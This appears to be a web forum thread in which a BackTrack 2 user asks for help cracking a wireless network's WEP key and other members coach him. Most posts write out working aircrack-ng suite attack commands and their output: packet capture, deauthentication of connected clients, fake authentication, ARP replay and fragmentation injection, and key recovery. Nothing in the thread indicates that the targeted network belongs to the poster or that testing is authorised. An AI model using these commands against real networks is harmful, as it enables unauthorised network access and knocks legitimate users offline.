Results 1 to 10 of 10

Thread: Black Track Final Question

  1. #1
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Question Black Track Final Question

    When I type the command

    airodump-ng -w capture.ivs -c 11 eth2

    the capture screen shows up and the packet numbers gose up and then I

    aireplay-ng --arpreplay -b 00:0F:3D:3B:E5:CA -h 00:118:AB:EA:B3 eht2

    right after I

    aireplay-ng -e DEFAULT -a 00:0F:3D:3B:E5:CA -c 01:118:AB:EA:B3 --deauth 10 eth2

    the packets go up and

    BSSID 00:00:00:00:00:00
    PWR -1
    RXQ 0
    Beacons 1130
    #Data , 10
    #/s 0
    CH 11
    MB 54
    ENC wep

    The Beacons keep going up and then it gets to the right amount and then I got the right amount
    aircrack-ng -f 4 -m 00:0F:3D:3B:E5:CA -n 128 capture.cap

    Opening capture.cap

    open failed: No such file or directory

    Is this something I am not setting up or some part of the code I missing or is it because I am running a Live CD of Black Track 2 Final and it not saving the capture packet into a file which in reture are not saveing to my harddrive because I am running a live and it not reading to my hard drive ....

    Thank You
    ram360

  2. #2
    Junior Member
    Join Date
    Feb 2007
    Posts
    73

    Default

    Beacons are just the AP broadcasting itself to the world. The have nothing to do with aircrack. What you need to pay attention to is the DATA packets being sent. Also when airodump saves packets to a file. It places an increment number at the end (eg. capture-01.ivs)

  3. #3
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Default

    thank you man well how do i get the Data to go up then because then I when the deauthentication attact the packet should jump up and start but the Data stays at 0

    what would the command be to to this

    aireplay-ng -e DEFAULT -a 00:0F:3D:3B:E5:CA -c 00:118:AB:EA:B3 --deauth 10 eth2


    ??? or is this not the right command to get the Data to start coming in ....

    aircrack-ng -f 4 -m 00:0F:3D:3B:E5:CA -n 128 capture-01.cap

    dose work sweet man thank you

    but now i need to get the DATA up and i got to find out how to do this

  4. #4
    Junior Member
    Join Date
    Feb 2007
    Posts
    73

    Default

    #1 Make sure that you do a FakeAuth before anything. Everything that precedes will be useless unless you do a FakeAuth.

    aireplay-ng -1 6000 -o 1 -q 10 -e <SSID> -a <AP> -h <MAC> ath0

    While running airodump-ng start ARP replay attack in another console

    aireplay-ng -3 -b <AP> -h <MAC> ath0

    Then use a DeAuth attack on the AP. If there is a client connected aireplay-ng will find an ARP request upon reconnect. This will prompt you to use that packet. Type 'y' and watch the DATA go crazy. Otherwise you may want to try using this tutorial It works great for me.

    Tutorial: How to crack WEP with no clients
    http://www.aircrack-ng.org/doku.php?...ith_no_clients

    I find the Fragmented attack to work wonders. If you do use this method. I suggest using:

    aireplay-ng -2 -b <AP> -h <MAC> -f 1 -m 68 -n 86 ath0

    To capture an appropriate packet to use for Frag attack and even chopchop. Then use packetforge-ng as described in tutorial.

  5. #5
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Default

    #1 Make sure that you do a FakeAuth before anything. Everything that precedes will be useless unless you do a FakeAuth.

    aireplay-ng -1 6000 -o 1 -q 10 -e <SSID> -a <AP> -h <MAC> ath0
    Default is this my Access point and Mac


    While running airodump-ng start ARP replay attack in another console

    aireplay-ng -3 -b <AP> -h <MAC>
    is this my Access point and Mac


    Then use a DeAuth attack on the AP. If there is a client connected aireplay-ng will find an ARP request upon reconnect. This will prompt you to use that packet. Type 'y' and watch the DATA go crazy. Otherwise you may want to try using this tutorial It works great for me.

    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    12:54:00 Sending Authentication Request
    12:54:02 Sending Authentication Request
    12:54:04 Sending Authentication Request
    12:54:06 Sending Authentication Request
    12:54:08 Sending Authentication Request
    12:54:10 Sending Authentication Request
    12:54:12 Sending Authentication Request
    12:54:14 Sending Authentication Request
    12:54:16 Sending Authentication Request
    12:54:18 Sending Authentication Request
    12:54:20 Sending Authentication Request
    12:54:22 Sending Authentication Request
    12:54:24 Sending Authentication Request
    12:54:26 Sending Authentication Request
    12:54:28 Sending Authentication Request
    12:54:30 Sending Authentication Request

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M)



  6. #6
    Junior Member
    Join Date
    Feb 2007
    Posts
    73

    Default

    **READ THE TUTORIAL LISTED ABOVE** If you have already... RE-READ IT!
    Everything is laid out real nicely for you. It explains everything that you need to know. As for your FAILED FakeAuth, some APs will not respond if it thinks that there is an INVALID MAC. Try using you real MAC first before anything and make sure that you are properly injecting packets.

  7. #7
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Question

    The error that I thought I was getting was not really an error becuase this what the command should be doing but i need to really use a diffferent tho

    aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 eth2

    *
    -2 means interactive replay
    *
    -b 00:14:6C:7E:40:80 selects packes with the MAC of the access point we are interested in ( Is this a MAC of a device that is on the network that you would see in airodump and the bottom where it should who is on the network...or do i got that all wrong.
    *
    -d FF:FF:FF:FF:FF:FF selects packets with a broadcast destination is the SSID of the network I want here
    *
    -t 1 selects packets with the “To Distribution System” flag set on
    *
    eth2 is the wireless interface

  8. #8
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Question

    I have a SENAO NL-2511CD card and I am using black track 2 final and I start kismet and get my information that i need and then I put the card in monitor mode and

    start airodump-ng -w capture -c 6 eth2 starts to capture

    then arpreplay -b (AP MAC) -h (Target machine connected to that AP) eth2

    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    13:51:15 Sending Authentication Request
    13:51:17 Sending Authentication Request
    13:51:19 Sending Authentication Request
    13:51:21 Sending Authentication Request
    13:51:23 Sending Authentication Request
    13:51:25 Sending Authentication Request
    13:51:27 Sending Authentication Request

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M).

    aireplay-ng -e BISSD -a (AP MAC)-c (target machine connected to that AP)C --deauth 10 eth2

    I should be getting a jump in the DATA but i get notthing.... dose anyone know why I was readin thought the FAQ on Aircrack-ng and found this

    First step, make sure you aren’t using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver (use cardctl ident to know you card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

    I am using Orinoco driver what do I need to do to fix this problem ... i see the steps but is this really all i need to do or do i need a peek driver.... or something also i have a Prism2 chipset do i need to flash it ...

    Thank You For Your Time

    Ram

  9. #9
    Junior Member
    Join Date
    Jan 2006
    Posts
    34

    Default

    00:00:00:00:00:00

    Is not a valid MAC

    Besides why are you fakeauthing
    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    13:51:15 Sending Authentication Request
    13:51:17 Sending Authentication Request
    13:51:19 Sending Authentication Request
    13:51:21 Sending Authentication Request
    13:51:23 Sending Authentication Request
    13:51:25 Sending Authentication Request
    13:51:27 Sending Authentication Request

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M).
    When there is a already a client connected?
    I advise you to go to the aircrack-ng site and read up a bit.

    Excellent stuff over there.

  10. #10
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    17

    Question

    I know 00:00:00:00:00:00 not really a MAC but I thought I should disclose that information

    Besides why are you fakeauthing----- is there something else I should be doing beside this I am wating my time ....

    is there another command I should be using

    *Attack 0: Deauthentication
    *Attack 1: Fake authentication
    *Attack 2: Interactive packet replay
    *Attack 3: ARP request replay attack
    *Attack 4: KoreK chopchop attack
    *Attack 5: Fragmentation attack

    I am using option 1. Should I would be using 2(Interactive packet replay)

    which will allow me to repeatedly spam the router with data from live traffic

    passing to/from it...it usually has a better chance of spurring up traffic.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •